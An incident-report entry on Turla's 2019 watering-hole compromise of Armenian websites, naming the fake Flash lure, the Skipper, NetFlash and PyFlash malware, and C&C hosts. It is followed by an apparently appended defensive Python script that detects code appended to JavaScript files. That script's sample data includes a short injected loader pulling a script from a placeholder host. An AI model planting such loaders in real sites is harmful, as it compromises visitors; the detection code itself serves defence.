Cyber Incident Victim: The Armenian Institute of International and Security Affairs
Date: Jan 2019
Location: Armenia
Summary
The Armenian Institute of International and Security Affairs was targeted in a watering hole campaign where attackers compromised multiple Armenian websites, injecting malicious JavaScript to redirect visitors to a server delivering a fake Adobe Flash update. This social engineering tactic prompted users to download malware, initially deploying the known Turla backdoor Skipper before transitioning to new payloads—NetFlash, a .NET downloader, and PyFlash, a Python-based backdoor. The malware collected system information, established persistence, and communicated with command-and-control servers, facilitating espionage activities against government and political entities. The operation leveraged persistent tracking mechanisms and selective targeting to infect high-value victims.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 2 techniques |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
The Armenian Institute of International and Security Affairs (aiisa.am) was compromised as part of a watering hole campaign, active since at least early 2019, attributed to the Turla advanced persistent threat group. Turla operators injected malicious JavaScript code into aiisa.am and three other Armenian websites—armconsul.ru (Armenian Embassy in Russia), mnp.nkr.am (Artsakh Ministry of Nature Protection), and adgf.am (Armenian Deposit Guarantee Fund)—to target government officials and policymakers. The attackers appended obfuscated JavaScript to legitimate site files, such as the jquery-migrate.min.js library, redirecting visitors to a second-stage script hosted on skategirlchina.com. This script performed browser fingerprinting and used an "evercookie" stored across multiple client-side storage mechanisms to recognise returning visitors. It collected system information—including browser plugins, screen resolution, and OS details—and transmitted it to Turla's command-and-control (C&C) infrastructure. Only a small subset of fingerprinted visitors were selected for further activity; those visitors received a fraudulent Adobe Flash update prompt via an injected iframe.

The social engineering lure led to the download of a malicious installer that executed both legitimate Flash software and Turla malware. Prior to September 2019, victims received the Skipper backdoor, a known Turla tool distributed via a self-extracting RAR archive. Skipper’s components included a communication module connecting to skategirlchina.com/wp-includes/ms-locale.php. In late August 2019, Turla shifted to delivering NetFlash, a .NET downloader, and PyFlash, a Python-based backdoor compiled via py2exe. NetFlash (winhost.exe) established persistence through scheduled tasks and retrieved PyFlash from hardcoded C&C servers like 134.209.222.206:15363. PyFlash exfiltrated system data—including outputs from systeminfo, ipconfig, and arp commands—via AES-encrypted HTTP communications. ESET researchers detected the campaign through telemetry, confirmed skategirlchina.com ceased malicious operations by November 2019, and notified Armenia’s national CERT prior to public disclosure in March 2020. The compromise enabled sustained espionage against Armenian governmental entities through persistent credential tracking and backdoor deployment.
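The description notes that the injected code was appended to legitimate files such as jquery-migrate.min.js, which leaves the known-good content intact as a prefix. The following is an added defensive example, not code from the page or from the campaign's analysts: a baseline integrity check that separates clean, appended and otherwise modified assets and lists the external hosts an appended tail loads from. All file content and the host name `second-stage.example.invalid` are constructed placeholders.

```python
"""Integrity check for served JavaScript assets (added example, not from the page).

Appending code to a legitimate file such as jquery-migrate.min.js leaves the
known-good content intact as a prefix, so a baseline comparison can separate
"clean", "appended" and "modified" files and list the external hosts the
appended tail loads from. Sample content is constructed; the host is a placeholder.
"""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Host names referenced by http(s) URLs inside an appended tail.
_URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

@dataclass
class Verdict:
    path: str
    status: str                 # clean | appended | modified | missing | unexpected
    appended_bytes: int = 0
    external_hosts: List[str] = field(default_factory=list)

def check_asset(path: str, baseline: bytes, current: Optional[bytes]) -> Verdict:
    """Compare one deployed asset against its known-good baseline."""
    if current is None:
        return Verdict(path, "missing")
    if hashlib.sha256(current).digest() == hashlib.sha256(baseline).digest():
        return Verdict(path, "clean")
    if current.startswith(baseline):
        # Original content untouched; everything after it was appended.
        tail = current[len(baseline):]
        hosts = sorted({h.lower() for h in _URL_HOST_RE.findall(tail.decode("utf-8", "replace"))})
        return Verdict(path, "appended", len(tail), hosts)
    return Verdict(path, "modified")   # edited in place, truncated or replaced

def scan(baselines: Dict[str, bytes], deployed: Dict[str, bytes]) -> List[Verdict]:
    """Check every baselined asset and flag deployed files that were never baselined."""
    verdicts = [check_asset(p, b, deployed.get(p)) for p, b in sorted(baselines.items())]
    verdicts += [Verdict(p, "unexpected") for p in sorted(set(deployed) - set(baselines))]
    return verdicts

# Constructed stand-ins for the legitimate library and for an injected loader.
BASELINE_JS = b"/*! jQuery Migrate v1.4.1 */\n(function(a){a.migrateVersion='1.4.1';})(jQuery);\n"
INJECTED_TAIL = (b"\n(function(){var s=document.createElement('script');"
                 b"s.src='https://second-stage.example.invalid/fp.js';"
                 b"document.head.appendChild(s);})();")

if __name__ == "__main__":
    for v in scan({"js/jquery-migrate.min.js": BASELINE_JS},
                  {"js/jquery-migrate.min.js": BASELINE_JS + INJECTED_TAIL}):
        print(v)
```

In practice the baseline dictionary would be built from the site's release artefacts (or a content hash manifest) and the deployed dictionary from what the web server actually serves, so that an unexpected tail or a new host in the output can be alerted on.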
